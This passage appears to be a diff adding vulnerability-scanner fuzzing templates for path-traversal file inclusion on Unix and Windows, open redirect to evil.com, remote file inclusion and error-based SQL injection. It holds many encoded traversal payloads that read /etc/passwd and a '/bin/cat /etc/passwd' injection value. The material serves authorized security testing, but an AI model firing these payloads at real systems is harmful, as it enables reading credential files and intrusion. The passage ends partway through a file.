- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
nix_fuzz:
|
||||
- '/etc/passwd'
|
||||
- '../../etc/passwd'
|
||||
- '../../../etc/passwd'
|
||||
- '/../../../../etc/passwd'
|
||||
- '../../../../../../../../../etc/passwd'
|
||||
- '../../../../../../../../etc/passwd'
|
||||
- '../../../../../../../etc/passwd'
|
||||
- '../../../../../../etc/passwd'
|
||||
- '../../../../../etc/passwd'
|
||||
- '../../../../etc/passwd'
|
||||
- '../../../etc/passwd'
|
||||
- '../../../etc/passwd%00'
|
||||
- '../../../../../../../../../../../../etc/passwd%00'
|
||||
- '../../../../../../../../../../../../etc/passwd'
|
||||
- '/../../../../../../../../../../etc/passwd^^'
|
||||
- '/../../../../../../../../../../etc/passwd'
|
||||
- '/./././././././././././etc/passwd'
|
||||
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
|
||||
- '..\..\..\..\..\..\..\..\..\..\etc\passwd'
|
||||
- '/..\../..\../..\../..\../..\../..\../etc/passwd'
|
||||
- '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
|
||||
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
|
||||
- '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
|
||||
- '%252e%252e%252fetc%252fpasswd'
|
||||
- '%252e%252e%252fetc%252fpasswd%00'
|
||||
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
|
||||
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
|
||||
- '....//....//etc/passwd'
|
||||
- '..///////..////..//////etc/passwd'
|
||||
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
|
||||
- '%0a/bin/cat%20/etc/passwd'
|
||||
- '%00/etc/passwd%00'
|
||||
- '%00../../../../../../etc/passwd'
|
||||
- '/../../../../../../../../../../../etc/passwd%00.jpg'
|
||||
- '/../../../../../../../../../../../etc/passwd%00.html'
|
||||
- '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
|
||||
- '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||
- '\\'/bin/cat%20/etc/passwd\\''
|
||||
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
|
||||
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
|
||||
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
|
||||
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: replace # replaces existing parameter value with fuzz payload
|
||||
mode: multiple # replaces all parameters value with fuzz payload
|
||||
fuzz:
|
||||
- '{{nix_fuzz}}'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- 'root:.*:0:0:'
|
||||
# digest: 4b0a00483046022100a1e70a22bc4f17a046a9b366a9015608da82f88439ab75d052b64088a7009da8022100e29c115d86b47951f1da2fb56d7953ec1e59e93d86b70d24d34ad8c14ad3064d:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,73 @@
|
|||
id: windows-lfi-fuzz
|
||||
|
||||
info:
|
||||
name: Local File Inclusion - Windows
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
tags: lfi,windows,dast
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
win_fuzz:
|
||||
- '\WINDOWS\win.ini'
|
||||
- '\WINDOWS\win.ini'
|
||||
- '\WINDOWS\win.ini%00'
|
||||
- '\WINNT\win.ini'
|
||||
- '\WINNT\win.ini%00'
|
||||
- 'windows/win.ini%00'
|
||||
- '../../windows/win.ini'
|
||||
- '....//....//windows/win.ini'
|
||||
- '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
|
||||
- '../../../../../windows/win.ini'
|
||||
- '/..///////..////..//////windows/win.ini'
|
||||
- '/../../../../../../../../../windows/win.ini'
|
||||
- './../../../../../../../../../../windows/win.ini'
|
||||
- '/...\...\...\...\...\...\...\...\...\windows\win.ini'
|
||||
- '/.../.../.../.../.../.../.../.../.../windows/win.ini'
|
||||
- '/..../..../..../..../..../..../..../..../..../windows/win.ini'
|
||||
- '/....\....\....\....\....\....\....\....\....\windows\win.ini'
|
||||
- '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
|
||||
- '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
|
||||
- '..%2f..%2f..%2f..%2fwindows/win.ini'
|
||||
- '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
|
||||
- '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
|
||||
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
|
||||
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
|
||||
- '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
|
||||
- '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
|
||||
- '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
|
||||
- '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
|
||||
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
|
||||
- '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
|
||||
- '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
|
||||
- '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
|
||||
- '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
|
||||
- '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
|
||||
- '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
|
||||
- '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
|
||||
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
|
||||
- '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
|
||||
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: replace # replaces existing parameter value with fuzz payload
|
||||
mode: multiple # replaces all parameters value with fuzz payload
|
||||
fuzz:
|
||||
- '{{win_fuzz}}'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
# digest: 490a00463044022061480301387935155bae9c0e84b58e21d4d9f1051b2e5fd9954c1397fdd9b67202204b03f96125fa3991ac2a30b43dac7a140a9ec509131b4203cd15efe2179f3b4a:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,182 @@
|
|||
id: open-redirect
|
||||
|
||||
info:
|
||||
name: Open Redirect Detection
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
tags: redirect,dast
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
redirect:
|
||||
- "evil.com"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
mode: single
|
||||
keys:
|
||||
- AuthState
|
||||
- URL
|
||||
- _url
|
||||
- callback
|
||||
- checkout
|
||||
- checkout_url
|
||||
- content
|
||||
- continue
|
||||
- continueTo
|
||||
- counturl
|
||||
- data
|
||||
- dest
|
||||
- dest_url
|
||||
- destination
|
||||
- dir
|
||||
- document
|
||||
- domain
|
||||
- done
|
||||
- download
|
||||
- feed
|
||||
- file
|
||||
- file_name
|
||||
- file_url
|
||||
- folder
|
||||
- folder_url
|
||||
- forward
|
||||
- from_url
|
||||
- go
|
||||
- goto
|
||||
- host
|
||||
- html
|
||||
- http
|
||||
- https
|
||||
- image
|
||||
- image_src
|
||||
- image_url
|
||||
- imageurl
|
||||
- img
|
||||
- img_url
|
||||
- include
|
||||
- langTo
|
||||
- load_file
|
||||
- load_url
|
||||
- login_to
|
||||
- login_url
|
||||
- logout
|
||||
- media
|
||||
- navigation
|
||||
- next
|
||||
- next_page
|
||||
- open
|
||||
- out
|
||||
- page
|
||||
- page_url
|
||||
- pageurl
|
||||
- path
|
||||
- picture
|
||||
- port
|
||||
- proxy
|
||||
- r
|
||||
- r2
|
||||
- redir
|
||||
- redirect
|
||||
- redirectUri
|
||||
- redirectUrl
|
||||
- redirect_to
|
||||
- redirect_uri
|
||||
- redirect_url
|
||||
- reference
|
||||
- referrer
|
||||
- req
|
||||
- request
|
||||
- ret
|
||||
- retUrl
|
||||
- return
|
||||
- returnTo
|
||||
- return_path
|
||||
- return_to
|
||||
- return_url
|
||||
- rt
|
||||
- rurl
|
||||
- show
|
||||
- site
|
||||
- source
|
||||
- src
|
||||
- target
|
||||
- to
|
||||
- u
|
||||
- uri
|
||||
- url
|
||||
- val
|
||||
- validate
|
||||
- view
|
||||
- window
|
||||
- back
|
||||
- cgi
|
||||
- follow
|
||||
- home
|
||||
- jump
|
||||
- link
|
||||
- location
|
||||
- menu
|
||||
- move
|
||||
- nav
|
||||
- orig_url
|
||||
- out_url
|
||||
- query
|
||||
- auth
|
||||
- callback_url
|
||||
- confirm_url
|
||||
- destination_url
|
||||
- domain_url
|
||||
- entry
|
||||
- exit
|
||||
- forward_url
|
||||
- go_to
|
||||
- goto_url
|
||||
- home_url
|
||||
- image_link
|
||||
- load
|
||||
- logout_url
|
||||
- nav_to
|
||||
- origin
|
||||
- page_link
|
||||
- redirect_link
|
||||
- ref
|
||||
- referrer_url
|
||||
- return_link
|
||||
- return_to_url
|
||||
- source_url
|
||||
- target_url
|
||||
- to_url
|
||||
- validate_url
|
||||
- DirectTo
|
||||
- relay
|
||||
|
||||
fuzz:
|
||||
- "https://{{redirect}}"
|
||||
|
||||
- part: query
|
||||
mode: single
|
||||
values:
|
||||
- "https?://" # Replace HTTP URLs with alternatives
|
||||
fuzz:
|
||||
- "https://{{redirect}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 301
|
||||
- 302
|
||||
- 307
|
||||
# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,33 @@
|
|||
id: generic-rfi
|
||||
|
||||
info:
|
||||
name: Generic Remote File Inclusion
|
||||
author: m4lwhere
|
||||
severity: high
|
||||
reference:
|
||||
- https://www.invicti.com/learn/remote-file-inclusion-rfi/
|
||||
tags: rfi,dast,oast
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
rfi:
|
||||
- "https://rfi.nessus.org/rfi.txt"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
mode: single
|
||||
fuzz:
|
||||
- "{{rfi}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: body # Confirms the PHP was executed
|
||||
words:
|
||||
- "NessusCodeExecTest"
|
||||
# digest: 490a0046304402201f706bb5944d3a4a5ee6f4a6920de5a04d097d9a8abaa3a4b3fc992dc96b97c6022059107f23f16f0e83e38f27702bf6184e2a17c11940d204a50a060879c932a76e:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,494 @@
|
|||
id: sqli-error-based
|
||||
|
||||
info:
|
||||
name: Error based SQL Injection
|
||||
author: geeknik,pdteam
|
||||
severity: critical
|
||||
description: |
|
||||
Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data,
|
||||
or to override valuable ones, or even to execute dangerous system level commands on the database host.
|
||||
This is accomplished by the application taking user input and combining it with static parameters to build an SQL query .
|
||||
tags: sqli,error,dast
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
injection:
|
||||
- "'"
|
||||
- "\""
|
||||
- ";"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: postfix
|
||||
fuzz:
|
||||
- "{{injection}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Adminer"
|
||||
negative: true
|
||||
# False Positive
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
# MySQL
|
||||
- "SQL syntax.*?MySQL"
|
||||
- "Warning.*?\\Wmysqli?_"
|
||||
- "MySQLSyntaxErrorException"
|
||||
- "valid MySQL result"
|
||||
- "check the manual that (corresponds to|fits) your MySQL server version"
|
||||
- "Unknown column '[^ ]+' in 'field list'"
|
||||
- "MySqlClient\\."
|
||||
- "com\\.mysql\\.jdbc"
|
||||
- "Zend_Db_(Adapter|Statement)_Mysqli_Exception"
|
||||
- "Pdo[./_\\\\]Mysql"
|
||||
- "MySqlException"
|
||||
- "SQLSTATE\\[\\d+\\]: Syntax error or access violation"
|
||||
# MariaDB
|
||||
- "check the manual that (corresponds to|fits) your MariaDB server version"
|
||||
# Drizzle
|
||||
- "check the manual that (corresponds to|fits) your Drizzle server version"
|
||||
# MemSQL
|
||||
- "MemSQL does not support this type of query"
|
||||
- "is not supported by MemSQL"
|
||||
- "unsupported nested scalar subselect"
|
||||
# PostgreSQL
|
||||
- "PostgreSQL.*?ERROR"
|
||||
- "Warning.*?\\Wpg_"
|
||||
- "valid PostgreSQL result"
|
||||
- "Npgsql\\."
|
||||
- "PG::SyntaxError:"
|
||||
- "org\\.postgresql\\.util\\.PSQLException"
|
||||
- "ERROR:\\s\\ssyntax error at or near"
|
||||
- "ERROR: parser: parse error at or near"
|
||||
- "PostgreSQL query failed"
|
||||
- "org\\.postgresql\\.jdbc"
|
||||
- "Pdo[./_\\\\]Pgsql"
|
||||
- "PSQLException"
|
||||
# Microsoft SQL Server
|
||||
- "Driver.*? SQL[\\-\\_\\ ]*Server"
|
||||
- "OLE DB.*? SQL Server"
|
||||
- "\\bSQL Server[^<"]+Driver"
|
||||
- "Warning.*?\\W(mssql|sqlsrv)_"
|
||||
- "\\bSQL Server[^<"]+[0-9a-fA-F]{8}"
|
||||
- "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)"
|
||||
- "(?s)Exception.*?\\bRoadhouse\\.Cms\\."
|
||||
- "Microsoft SQL Native Client error '[0-9a-fA-F]{8}"
|
||||
- "\\[SQL Server\\]"
|
||||
- "ODBC SQL Server Driver"
|
||||
- "ODBC Driver \\d+ for SQL Server"
|
||||
- "SQLServer JDBC Driver"
|
||||
- "com\\.jnetdirect\\.jsql"
|
||||
- "macromedia\\.jdbc\\.sqlserver"
|
||||
- "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"
|
||||
- "com\\.microsoft\\.sqlserver\\.jdbc"
|
||||
- "Pdo[./_\\\\](Mssql|SqlSrv)"
|
||||
- "SQL(Srv|Server)Exception"
|
||||
- "Unclosed quotation mark after the character string"
|
||||
# Microsoft Access
|
||||
- "Microsoft Access (\\d+ )?Driver"
|
||||
- "JET Database Engine"
|
||||
- "Access Database Engine"
|
||||
- "ODBC Microsoft Access"
|
||||
- "Syntax error \\(missing operator\\) in query expression"
|
||||
# Oracle
|
||||
- "\\bORA-\\d{5}"
|
||||
- "Oracle error"
|
||||
- "Oracle.*?Driver"
|
||||
- "Warning.*?\\W(oci|ora)_"
|
||||
- "quoted string not properly terminated"
|
||||
- "SQL command not properly ended"
|
||||
- "macromedia\\.jdbc\\.oracle"
|
||||
- "oracle\\.jdbc"
|
||||
- "Zend_Db_(Adapter|Statement)_Oracle_Exception"
|
||||
- "Pdo[./_\\\\](Oracle|OCI)"
|
||||
- "OracleException"
|
||||
# IBM DB2
|
||||
- "CLI Driver.*?DB2"
|
||||
- "DB2 SQL error"
|
||||
- "\\bdb2_\\w+\\("
|
||||
- "SQLCODE[=:\\d, -]+SQLSTATE"
|
||||
- "com\\.ibm\\.db2\\.jcc"
|
||||
- "Zend_Db_(Adapter|Statement)_Db2_Exception"
|
||||
- "Pdo[./_\\\\]Ibm"
|
||||
- "DB2Exception"
|
||||
- "ibm_db_dbi\\.ProgrammingError"
|
||||
# Informix
|
||||
- "Warning.*?\\Wifx_"
|
||||
- "Exception.*?Informix"
|
||||
- "Informix ODBC Driver"
|
||||
- "ODBC Informix driver"
|
||||
- "com\\.informix\\.jdbc"
|
||||
- "weblogic\\.jdbc\\.informix"
|
||||
- "Pdo[./_\\\\]Informix"
|
||||
- "IfxException"
|
||||
# Firebird
|
||||
- "Dynamic SQL Error"
|
||||
- "Warning.*?\\Wibase_"
|
||||
- "org\\.firebirdsql\\.jdbc"
|
||||
- "Pdo[./_\\\\]Firebird"
|
||||
# SQLite
|
||||
- "SQLite/JDBCDriver"
|
||||
- "SQLite\\.Exception"
|
||||
- "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException"
|
||||
- "Warning.*?\\W(sqlite_|SQLite3::)"
|
||||
- "\\[SQLITE_ERROR\\]"
|
||||
- "SQLite error \\d+:"
|
||||
- "sqlite3.OperationalError:"
|
||||
- "SQLite3::SQLException"
|
||||
- "org\\.sqlite\\.JDBC"
|
||||
- "Pdo[./_\\\\]Sqlite"
|
||||
- "SQLiteException"
|
||||
# SAP MaxDB
|
||||
- "SQL error.*?POS([0-9]+)"
|
||||
- "Warning.*?\\Wmaxdb_"
|
||||
- "DriverSapDB"
|
||||
- "-3014.*?Invalid end of SQL statement"
|
||||
- "com\\.sap\\.dbtech\\.jdbc"
|
||||
- "\\[-3008\\].*?: Invalid keyword or missing delimiter"
|
||||
# Sybase
|
||||
- "Warning.*?\\Wsybase_"
|
||||
- "Sybase message"
|
||||
- "Sybase.*?Server message"
|
||||
- "SybSQLException"
|
||||
- "Sybase\\.Data\\.AseClient"
|
||||
- "com\\.sybase\\.jdbc"
|
||||
# Ingres
|
||||
- "Warning.*?\\Wingres_"
|
||||
- "Ingres SQLSTATE"
|
||||
- "Ingres\\W.*?Driver"
|
||||
- "com\\.ingres\\.gcf\\.jdbc"
|
||||
# FrontBase
|
||||
- "Exception (condition )?\\d+\\. Transaction rollback"
|
||||
- "com\\.frontbase\\.jdbc"
|
||||
- "Syntax error 1. Missing"
|
||||
- "(Semantic|Syntax) error [1-4]\\d{2}\\."
|
||||
# HSQLDB
|
||||
- "Unexpected end of command in statement \\["
|
||||
- "Unexpected token.*?in statement \\["
|
||||
- "org\\.hsqldb\\.jdbc"
|
||||
# H2
|
||||
- "org\\.h2\\.jdbc"
|
||||
- "\\[42000-192\\]"
|
||||
# MonetDB
|
||||
- "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)"
|
||||
- "\\[MonetDB\\]\\[ODBC Driver"
|
||||
- "nl\\.cwi\\.monetdb\\.jdbc"
|
||||
# Apache Derby
|
||||
- "Syntax error: Encountered"
|
||||
- "org\\.apache\\.derby"
|
||||
- "ERROR 42X01"
|
||||
# Vertica
|
||||
- ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"
|
||||
- "/vertica/Parser/scan"
|
||||
- "com\\.vertica\\.jdbc"
|
||||
- "org\\.jkiss\\.dbeaver\\.ext\\.vertica"
|
||||
- "com\\.vertica\\.dsi\\.dataengine"
|
||||
# Mckoi
|
||||
- "com\\.mckoi\\.JDBCDriver"
|
||||
- "com\\.mckoi\\.database\\.jdbc"
|
||||
- "<REGEX_LITERAL>"
|
||||
# Presto
|
||||
- "com\\.facebook\\.presto\\.jdbc"
|
||||
- "io\\.prestosql\\.jdbc"
|
||||
- "com\\.simba\\.presto\\.jdbc"
|
||||
- "UNION query has different number of fields: \\d+, \\d+"
|
||||
# Altibase
|
||||
- "Altibase\\.jdbc\\.driver"
|
||||
# MimerSQL
|
||||
- "com\\.mimer\\.jdbc"
|
||||
- "Syntax error,[^\\n]+assumed to mean"
|
||||
# CrateDB
|
||||
- "io\\.crate\\.client\\.jdbc"
|
||||
# Cache
|
||||
- "encountered after end of query"
|
||||
- "A comparison operator is required here"
|
||||
# Raima Database Manager
|
||||
- "-10048: Syntax error"
|
||||
- "rdmStmtPrepare\\(.+?\\) returned"
|
||||
# Virtuoso
|
||||
- "SQ074: Line \\d+:"
|
||||
- "SR185: Undefined procedure"
|
||||
- "SQ200: No table "
|
||||
- "Virtuoso S0002 Error"
|
||||
- "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: mysql
|
||||
regex:
|
||||
- "SQL syntax.*?MySQL"
|
||||
- "Warning.*?\\Wmysqli?_"
|
||||
- "MySQLSyntaxErrorException"
|
||||
- "valid MySQL result"
|
||||
- "check the manual that (corresponds to|fits) your MySQL server version"
|
||||
- "Unknown column '[^ ]+' in 'field list'"
|
||||
- "MySqlClient\\."
|
||||
- "com\\.mysql\\.jdbc"
|
||||
- "Zend_Db_(Adapter|Statement)_Mysqli_Exception"
|
||||
- "Pdo[./_\\\\]Mysql"
|
||||
- "MySqlException"
|
||||
- "SQLSTATE[\\d+]: Syntax error or access violation"
|
||||
|
||||
- type: regex
|
||||
name: mariadb
|
||||
regex:
|
||||
- "check the manual that (corresponds to|fits) your MariaDB server version"
|
||||
|
||||
- type: regex
|
||||
name: drizzel
|
||||
regex:
|
||||
- "check the manual that (corresponds to|fits) your Drizzle server version"
|
||||
|
||||
- type: regex
|
||||
name: memsql
|
||||
regex:
|
||||
- "MemSQL does not support this type of query"
|
||||
- "is not supported by MemSQL"
|
||||
- "unsupported nested scalar subselect"
|
||||
|
||||
- type: regex
|
||||
name: postgresql
|
||||
regex:
|
||||
- "PostgreSQL.*?ERROR"
|
||||
- "Warning.*?\\Wpg_"
|
||||
- "valid PostgreSQL result"
|
||||
- "Npgsql\\."
|
||||
- "PG::SyntaxError:"
|
||||
- "org\\.postgresql\\.util\\.PSQLException"
|
||||
- "ERROR:\\s\\ssyntax error at or near"
|
||||
- "ERROR: parser: parse error at or near"
|
||||
- "PostgreSQL query failed"
|
||||
- "org\\.postgresql\\.jdbc"
|
||||
- "Pdo[./_\\\\]Pgsql"
|
||||
- "PSQLException"
|
||||
|
||||
- type: regex
|
||||
name: microsoftsqlserver
|
||||
regex:
|
||||
- "Driver.*? SQL[\\-\\_\\ ]*Server"
|
||||
- "OLE DB.*? SQL Server"
|
||||
- "\\bSQL Server[^<"]+Driver"
|
||||
- "Warning.*?\\W(mssql|sqlsrv)_"
|
||||
- "\\bSQL Server[^<"]+[0-9a-fA-F]{8}"
|
||||
- "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)"
|
||||
- "(?s)Exception.*?\\bRoadhouse\\.Cms\\."
|
||||
- "Microsoft SQL Native Client error '[0-9a-fA-F]{8}"
|
||||
- "\\[SQL Server\\]"
|
||||
- "ODBC SQL Server Driver"
|
||||
- "ODBC Driver \\d+ for SQL Server"
|
||||
- "SQLServer JDBC Driver"
|
||||
- "com\\.jnetdirect\\.jsql"
|
||||
- "macromedia\\.jdbc\\.sqlserver"
|
||||
- "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"
|
||||
- "com\\.microsoft\\.sqlserver\\.jdbc"
|
||||
- "Pdo[./_\\\\](Mssql|SqlSrv)"
|
||||
- "SQL(Srv|Server)Exception"
|
||||
- "Unclosed quotation mark after the character string"
|
||||
|
||||
- type: regex
|
||||
name: microsoftaccess
|
||||
regex:
|
||||
- "Microsoft Access (\\d+ )?Driver"
|
||||
- "JET Database Engine"
|
||||
- "Access Database Engine"
|
||||
- "ODBC Microsoft Access"
|
||||
- "Syntax error \\(missing operator\\) in query expression"
|
||||
|
||||
- type: regex
|
||||
name: oracle
|
||||
regex:
|
||||
- "\\bORA-\\d{5}"
|
||||
- "Oracle error"
|
||||
- "Oracle.*?Driver"
|
||||
- "Warning.*?\\W(oci|ora)_"
|
||||
- "quoted string not properly terminated"
|
||||
- "SQL command not properly ended"
|
||||
- "macromedia\\.jdbc\\.oracle"
|
||||
- "oracle\\.jdbc"
|
||||
- "Zend_Db_(Adapter|Statement)_Oracle_Exception"
|
||||
- "Pdo[./_\\\\](Oracle|OCI)"
|
||||
- "OracleException"
|
||||
|
||||
- type: regex
|
||||
name: ibmdb2
|
||||
regex:
|
||||
- "CLI Driver.*?DB2"
|
||||
- "DB2 SQL error"
|
||||
- "\\bdb2_\\w+\\("
|
||||
- "SQLCODE[=:\\d, -]+SQLSTATE"
|
||||
- "com\\.ibm\\.db2\\.jcc"
|
||||
- "Zend_Db_(Adapter|Statement)_Db2_Exception"
|
||||
- "Pdo[./_\\\\]Ibm"
|
||||
- "DB2Exception"
|
||||
- "ibm_db_dbi\\.ProgrammingError"
|
||||
|
||||
- type: regex
|
||||
name: informix
|
||||
regex:
|
||||
- "Warning.*?\\Wifx_"
|
||||
- "Exception.*?Informix"
|
||||
- "Informix ODBC Driver"
|
||||
- "ODBC Informix driver"
|
||||
- "com\\.informix\\.jdbc"
|
||||
- "weblogic\\.jdbc\\.informix"
|
||||
- "Pdo[./_\\\\]Informix"
|
||||
- "IfxException"
|
||||
|
||||
- type: regex
|
||||
name: firebird
|
||||
regex:
|
||||
- "Dynamic SQL Error"
|
||||
- "Warning.*?\\Wibase_"
|
||||
- "org\\.firebirdsql\\.jdbc"
|
||||
- "Pdo[./_\\\\]Firebird"
|
||||
|
||||
- type: regex
|
||||
name: sqlite
|
||||
regex:
|
||||
- "SQLite/JDBCDriver"
|
||||
- "SQLite\\.Exception"
|
||||
- "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException"
|
||||
- "Warning.*?\\W(sqlite_|SQLite3::)"
|
||||
- "\\[SQLITE_ERROR\\]"
|
||||
- "SQLite error \\d+:"
|
||||
- "sqlite3.OperationalError:"
|
||||
- "SQLite3::SQLException"
|
||||
- "org\\.sqlite\\.JDBC"
|
||||
- "Pdo[./_\\\\]Sqlite"
|
||||
- "SQLiteException"
|
||||
|
||||
- type: regex
|
||||
name: sapmaxdb
|
||||
regex:
|
||||
- "SQL error.*?POS([0-9]+)"
|
||||
- "Warning.*?\\Wmaxdb_"
|
||||
- "DriverSapDB"
|
||||
- "-3014.*?Invalid end of SQL statement"
|
||||
- "com\\.sap\\.dbtech\\.jdbc"
|
||||
- "\\[-3008\\].*?: Invalid keyword or missing delimiter"
|
||||
|
||||
- type: regex
|
||||
name: sybase
|
||||
regex:
|
||||
- "Warning.*?\\Wsybase_"
|
||||
- "Sybase message"
|
||||
- "Sybase.*?Server message"
|
||||
- "SybSQLException"
|
||||
- "Sybase\\.Data\\.AseClient"
|
||||
- "com\\.sybase\\.jdbc"
|
||||
|
||||
- type: regex
|
||||
name: ingres
|
||||
regex:
|
||||
- "Warning.*?\\Wingres_"
|
||||
